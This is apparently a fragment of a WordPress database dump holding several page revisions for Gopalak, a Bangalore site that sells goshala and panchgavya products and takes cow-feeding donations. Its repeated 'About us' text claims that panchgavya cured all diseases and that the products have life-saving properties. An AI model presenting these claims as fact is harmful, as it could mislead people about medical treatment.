lementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','AboutUs','','publish','closed','closed','','aboutus','','','2022-10-28 12:36:32','2022-10-28 07:06:32','',0,'https://gopalak.in/?page_id=1804',0,'page','',0),(1805,1,'2022-10-17 10:12:17','2022-10-17 04:42:17','','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 10:12:17','2022-10-17 04:42:17','',1804,'https://gopalak.in/?p=1805',0,'revision','',0),(1806,1,'2022-10-17 10:37:52','2022-10-17 05:07:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 10:37:52','2022-10-17 05:07:52','',1804,'https://gopalak.in/?p=1806',0,'revision','',0),(1807,1,'2022-10-17 10:37:52','2022-10-17 05:07:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 10:37:52','2022-10-17 05:07:52','',1804,'https://gopalak.in/?p=1807',0,'revision','',0),(1808,1,'2022-10-17 10:37:52','2022-10-17 05:07:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 10:37:52','2022-10-17 05:07:52','',1804,'https://gopalak.in/?p=1808',0,'revision','',0),(1809,1,'2022-10-17 10:42:25','2022-10-17 05:12:25','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','AboutUs','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 10:42:25','2022-10-17 05:12:25','',1804,'https://gopalak.in/?p=1809',0,'revision','',0),(1810,1,'2022-10-17 10:42:59','2022-10-17 05:12:59','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" 